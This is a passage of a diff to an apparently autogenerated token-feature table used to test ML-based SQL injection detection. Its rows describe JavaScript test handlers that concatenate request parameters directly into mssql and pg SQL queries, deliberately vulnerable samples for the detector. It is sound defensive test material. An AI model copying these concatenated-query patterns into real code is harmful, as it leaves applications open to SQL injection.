where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:62 | "select ... id = '" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:62 | "select ... id = '" | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:62 | "select ... id = '" | stringConcatenatedWith | -endpoint- req.params.id + ''' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:78 | "select ... rams.id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:78 | "select ... rams.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:78 | "select ... rams.id | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:78 | "select ... rams.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:78 | "select ... rams.id | fileImports | express mssql | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:84 | "select ... d + "'" | CalleeFlexibleAccessPath | sql.Request().query | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:84 | "select ... d + "'" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:84 | "select ... d + "'" | calleeImports | mssql | @@ -4407,12 +21162,172 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:84 | "select ... d + "'" | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:84 | "select ... d + "'" | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:84 | "select ... d + "'" | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:68 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:68 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:68 | req | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:68 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:68 | req | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:75 | req.params | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:75 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:75 | req.params | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:75 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:75 | req.params | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:78 | req.params.id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:78 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:78 | req.params.id | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:78 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:78 | req.params.id | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:66:9:78 | req.params.id | stringConcatenatedWith | 'select * from mytable where id = '' -endpoint- ''' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:70:9:75 | params | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:70:9:75 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:70:9:75 | params | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:70:9:75 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:70:9:75 | params | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:77:9:78 | id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:77:9:78 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:77:9:78 | id | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:77:9:78 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:77:9:78 | id | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:82:9:84 | "'" | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:82:9:84 | "'" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:82:9:84 | "'" | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:82:9:84 | "'" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:82:9:84 | "'" | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:82:9:84 | "'" | stringConcatenatedWith | 'select * from mytable where id = '' + req.params.id -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:1:1:1:0 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:1:1:1:0 | this | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:1:1:1:1 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:1:1:1:1 | pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:1:1:1:1 | pool | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:1:1:1:1 | require | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:1:1:1:1 | require | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:7:3:8 | pg | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:7:3:8 | pg | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:7:3:8 | pg | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:7:3:24 | pg | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:7:3:24 | pg | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:7:3:24 | pg | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:7:3:24 | pg = require('pg') | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:7:3:24 | pg = require('pg') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:7:3:24 | pg = require('pg') | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:12:3:18 | require | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:12:3:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:12:3:18 | require | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:12:3:24 | exceptional return of require('pg') | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:12:3:24 | exceptional return of require('pg') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:12:3:24 | exceptional return of require('pg') | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:12:3:24 | require('pg') | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:12:3:24 | require('pg') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:12:3:24 | require('pg') | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:20:3:23 | 'pg' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:20:3:23 | 'pg' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:20:3:23 | 'pg' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:20:3:23 | 'pg' | contextFunctionInterfaces | handler(req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:20:3:23 | 'pg' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:3:20:3:23 | 'pg' | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:7:4:10 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:7:4:10 | pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:7:4:10 | pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:7:4:10 | pool | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:7:4:32 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:7:4:32 | pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:7:4:32 | pool | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:7:4:32 | pool = ... config) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:7:4:32 | pool = ... config) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:7:4:32 | pool = ... config) | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:14:4:32 | exceptional return of new pg.Pool(config) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:14:4:32 | exceptional return of new pg.Pool(config) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:14:4:32 | exceptional return of new pg.Pool(config) | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:14:4:32 | new pg.Pool(config) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:14:4:32 | new pg.Pool(config) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:14:4:32 | new pg.Pool(config) | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:18:4:19 | pg | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:18:4:19 | pg | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:18:4:19 | pg | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:18:4:24 | pg.Pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:18:4:24 | pg.Pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:18:4:24 | pg.Pool | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:21:4:24 | Pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:21:4:24 | Pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:21:4:24 | Pool | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:26:4:31 | config | CalleeFlexibleAccessPath | pg.Pool | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:26:4:31 | config | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:26:4:31 | config | calleeImports | pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:26:4:31 | config | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:26:4:31 | config | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:4:26:4:31 | config | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:6:0 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:6:0 | pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:6:0 | pool | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:6:0 | pool | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:6:0 | pool | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:6:0 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:6:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:6:0 | this | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:6:0 | this | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:6:0 | this | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | 'arguments' object of function handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | 'arguments' object of function handler | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | 'arguments' object of function handler | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | 'arguments' object of function handler | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | 'arguments' object of function handler | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | exceptional return of function handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | exceptional return of function handler | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | exceptional return of function handler | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | exceptional return of function handler | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | exceptional return of function handler | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | functio ... });\\n} | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | functio ... });\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | functio ... });\\n} | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | return of function handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | return of function handler | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | return of function handler | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | return of function handler | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:1:19:1 | return of function handler | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:10:6:16 | handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:10:6:16 | handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:10:6:16 | handler | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:10:6:16 | handler | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:10:6:16 | handler | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:10:6:16 | handler | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:18:6:20 | req | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:18:6:20 | req | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:18:6:20 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:18:6:20 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:18:6:20 | req | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:18:6:20 | req | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:18:6:20 | req | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:18:6:20 | req | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:18:6:20 | req | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:18:6:20 | req | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:23:6:25 | res | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:23:6:25 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:23:6:25 | res | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:23:6:25 | res | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:6:23:6:25 | res | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:7:12 | query1 | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:7:12 | query1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:7:12 | query1 | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:7:12 | query1 | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:7:12 | query1 | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:8:55 | query1 | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:8:55 | query1 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:8:55 | query1 | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:8:55 | query1 | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:8:55 | query1 | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:8:55 | query1 ... PRICE" | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:8:55 | query1 ... PRICE" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:8:55 | query1 ... PRICE" | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:8:55 | query1 ... PRICE" | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:7:8:55 | query1 ... PRICE" | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:7:69 | "SELECT ... GORY='" | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:7:69 | "SELECT ... GORY='" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:7:69 | "SELECT ... GORY='" | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:7:69 | "SELECT ... GORY='" | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:7:69 | "SELECT ... GORY='" | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:7:69 | "SELECT ... GORY='" | stringConcatenatedWith | -endpoint- req.params.category + '' ORDER BY PRICE' | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:8:34 | "SELECT ... ategory | contextFunctionInterfaces | handler(req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:8:34 | "SELECT ... ategory | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:8:34 | "SELECT ... ategory | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | @@ -4423,6 +21338,63 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:8:55 | "SELECT ... PRICE" | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:8:55 | "SELECT ... PRICE" | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:7:16:8:55 | "SELECT ... PRICE" | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:18 | req | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:18 | req | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:18 | req | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:18 | req | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:25 | req.params | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:25 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:25 | req.params | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:25 | req.params | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:25 | req.params | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:34 | req.params.category | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:34 | req.params.category | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:34 | req.params.category | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:34 | req.params.category | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:34 | req.params.category | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:16:8:34 | req.params.category | stringConcatenatedWith | 'SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='' -endpoint- '' ORDER BY PRICE' | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:20:8:25 | params 